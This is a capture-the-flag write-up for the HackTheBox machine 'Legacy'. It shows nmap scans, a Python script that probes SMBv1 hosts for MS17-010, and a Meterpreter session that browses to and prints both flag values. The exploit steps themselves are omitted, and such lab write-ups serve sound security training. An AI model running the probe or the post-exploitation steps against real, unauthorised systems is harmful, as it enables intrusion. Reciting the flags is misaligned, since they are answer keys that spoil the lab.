Legacy
About this machine: HTB
Operating System: Windows
Skills Used:
EternalBlue exploitation (MS17-010)
Methodology:
Initial reconnaissance scan with nmap (SYN scan of all TCP ports, no host discovery, no DNS resolution):
❯ nmap -T4 -sS -Pn -p- --open -n 10.10.10.4 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 20:08 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.06% done
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 20:09 (0:00:50 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Version detection and default NSE scripts against the three open ports:
❯ nmap -T4 -sS -Pn -p135,139,445 -sVC -n 10.10.10.4 -oN sV_scan
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2025-05-10T05:07:40+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b0:4c:57 (VMware)
|_clock-skew: mean: 5d00h27m31s, deviation: 2h07m16s, median: 4d22h57m31s
The version scan already identifies the host as Windows XP with an SMBv1-only stack (SMB2 negotiation fails) and SMB signing disabled, which points straight at MS17-010. We confirm it with the vulnerability scripts for port 445; the filter "vuln and safe" runs the non-intrusive checks only, and smb-vuln-ms17-010 is in both categories:
❯ nmap --script "vuln and safe" -p445 10.10.10.4
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
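To show what the nmap script above is actually doing, here is an added example (not part of the original write-up, and not nmap's or Metasploit's code) that performs the same MS17-010 check over raw SMBv1 with only the Python standard library: it negotiates the NT LM 0.12 dialect, opens a null session (the guest account the nmap output reports), connects to IPC$ and sends an SMB_COM_TRANSACTION PeekNamedPipe on FID 0. An unpatched server answers STATUS_INSUFF_SERVER_RESOURCES, a patched one STATUS_INVALID_HANDLE or STATUS_NOT_IMPLEMENTED. It assumes a target reachable on TCP 445 that still allows anonymous IPC$ access; the default target address 10.10.10.4 is the one from this write-up.

```python
"""Raw SMBv1 probe for MS17-010 (CVE-2017-0143), standard library only.

Added example mirroring the nmap smb-vuln-ms17-010 logic: null session on
IPC$, then a Trans PeekNamedPipe on FID 0 and a look at the NT status.
"""
import socket
import struct
import sys

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # answer from an unpatched server
PATCHED_STATUSES = {0xC0000008, 0xC0000002}   # INVALID_HANDLE, NOT_IMPLEMENTED
TRANS_PEEK_NMPIPE = 0x23


def smb_header(command, tid=0, uid=0, mid=1, status=0):
    """32-byte SMBv1 header (MS-CIFS 2.2.3.1). Flags 0x18 = canonical,
    case-insensitive paths; Flags2 0x4001 = 32-bit NT status + long names.
    Unicode is deliberately off so every string below is plain ASCII."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18,
                       0x4001, 0, bytes(8), 0, tid, 0x1234, uid, mid)


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(0x72) + struct.pack("<BH", 0, len(dialects)) + dialects


def session_setup_request():
    """Session Setup AndX for a null session: empty account, domain, password."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 50, 1, 0, 0, 0, 0, 0x50)
    data = b"\x00\x00\x00\x00"  # account, domain, native OS, native LAN manager
    return smb_header(0x73) + bytes([13]) + words + struct.pack("<H", len(data)) + data


def tree_connect_request(host, uid):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # no AndX, flags 0, pwlen 1
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    return smb_header(0x75, uid=uid) + bytes([4]) + words + struct.pack("<H", len(data)) + data


def peek_named_pipe_request(tid, uid):
    """SMB_COM_TRANSACTION with setup words [PeekNamedPipe, FID 0]."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)  # where parameters/data would start
    words = struct.pack("<HHHHBBHIHHHHHBBHH",
                        0, 0,                  # TotalParameterCount, TotalDataCount
                        0xFFFF, 0x800,         # MaxParameterCount, MaxDataCount
                        0, 0, 0, 0, 0,         # MaxSetupCount, Reserved, Flags, Timeout, Reserved2
                        0, offset, 0, offset,  # ParameterCount/Offset, DataCount/Offset
                        2, 0,                  # SetupCount, Reserved3
                        TRANS_PEEK_NMPIPE, 0)  # Setup[0] subcommand, Setup[1] FID
    return smb_header(0x25, tid=tid, uid=uid) + bytes([16]) + words + struct.pack("<H", len(name)) + name


def parse_header(pkt):
    """Return (command, nt_status, tid, uid) from a raw SMBv1 message."""
    if len(pkt) < 32 or pkt[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    f = struct.unpack("<4sBIBHH8sHHHHH", pkt[:32])
    return f[1], f[2], f[8], f[10]


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in PATCHED_STATUSES:
        return "PATCHED"
    return "UNKNOWN"


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def _exchange(sock, smb):
    """Wrap in a NetBIOS session header (type 0, 24-bit length), read the reply."""
    sock.sendall(struct.pack(">I", len(smb)) + smb)
    length = struct.unpack(">I", _recv_exact(sock, 4))[0] & 0x00FFFFFF
    return parse_header(_recv_exact(sock, length))


def check_ms17_010(host, port=445, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        uid = 0
        for step, pkt in (("negotiate", negotiate_request()),
                          ("session setup", session_setup_request())):
            _, status, _, uid = _exchange(s, pkt)
            if status:
                raise RuntimeError("%s failed: 0x%08X" % (step, status))
        _, status, tid, _ = _exchange(s, tree_connect_request(host, uid))
        if status:
            raise RuntimeError("tree connect failed: 0x%08X" % status)
        _, status, _, _ = _exchange(s, peek_named_pipe_request(tid, uid))
    return classify(status)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.4"
    print(target, check_ms17_010(target))
```

Run it as `python3 ms17_010_check.py 10.10.10.4`; a vulnerable host prints VULNERABLE. The probe is read-only (it never triggers the overflow), which is why the nmap script carries the "safe" category, but it does create a null session and a tree connect that will show up in SMB audit logs.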
The host is vulnerable to MS17-010 (CVE-2017-0143), so we exploit it with Metasploit. The Metasploit steps are not reproduced here; note that exploit/windows/smb/ms17_010_eternalblue targets 64-bit Windows 7 / Server 2008 R2 and later and does not support Windows XP, whereas exploit/windows/smb/ms17_010_psexec covers XP through the named-pipe transaction primitive.
The exploit worked and we have a Meterpreter session. Because MS17-010 is exploited inside the kernel, the session runs as NT AUTHORITY\SYSTEM, so both flags can be read without any privilege escalation. One practical detail: Meterpreter's cd splits its argument on spaces, so cd Documents and Settings fails; either quote the path or use the 8.3 short name DOCUME~1 as done below. Now we look for the flags:
(Meterpreter 1)(C:\windows) > cd /
(Meterpreter 1)(C:) > dir
Listing: C:\
Mode Size Type Last modified Name
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
040555/r-xr-xr-x 0 dir 2017-12-29 15:41:18 -0500 Program Files
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:59 -0400 System Volume Information
040777/rwxrwxrwx 0 dir 2025-05-09 22:27:02 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:26:58 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
(Meterpreter 1)(C:) > cd /Documents and Settings
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
(Meterpreter 1)(C:) > cd DOCUME~1
(Meterpreter 1)(C:\DOCUME~1) > dir
Listing: C:\DOCUME~1
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john
(Meterpreter 1)(C:\DOCUME~1) > cd Administrator
(Meterpreter 1)(C:\DOCUME~1\Administrator) > dir
Listing: C:\DOCUME~1\Administrator
Mode Size Type Last modified Name
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:29 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:18:27 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:32 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2022-05-28 06:28:03 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:24 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2022-05-28 06:28:03 -0400 ntuser.ini
(Meterpreter 1)(C:\DOCUME~1\Administrator) > cd Desktop
(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > dir
Listing: C:\DOCUME~1\Administrator\Desktop
Mode Size Type Last modified Name
100444/r--r--r-- 32 fil 2017-03-16 02:18:50 -0400 root.txt
(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > cat root.txt
993442d258b0e0ec917cae9e695d5713
(Meterpreter 1)(C:\DOCUME~1) > dir
Listing: C:\DOCUME~1
Mode Size Type Last modified Name
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john
(Meterpreter 1)(C:\DOCUME~1) > cd /all_users
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
(Meterpreter 1)(C:\DOCUME~1) > cd john
(Meterpreter 1)(C:\DOCUME~1\john) > dir
Listing: C:\DOCUME~1\john
Mode Size Type Last modified Name
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:50 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:19:33 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:55 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 02:19:59 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:44 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 02:19:59 -0400 ntuser.ini
(Meterpreter 1)(C:\DOCUME~1\john) > cd Desktop
(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > dir
Listing: C:\DOCUME~1\john\Desktop
Mode Size Type Last modified Name
100444/r--r--r-- 32 fil 2017-03-16 02:19:49 -0400 user.txt
(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
With both flags obtained, the Legacy machine is done.